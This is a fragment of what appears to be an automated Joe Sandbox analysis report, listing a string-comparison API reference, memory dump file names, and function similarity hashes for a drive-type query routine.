                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 003D1214
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: b15503822e8487f33c359a527a3b54d859e8aecdbe66ad780d02856a2f8bf1e6
                                              • Instruction ID: e60a431d7cd7de6cf46e2bdd95657dc17018034152b87a9d8e216f13038e3aec
                                              • Opcode Fuzzy Hash: b15503822e8487f33c359a527a3b54d859e8aecdbe66ad780d02856a2f8bf1e6
                                              • Instruction Fuzzy Hash: 4601ECB594021CABCB21DFA5EC497DDB7B8AB05705F0084AAEA05A6240D6319F85CF95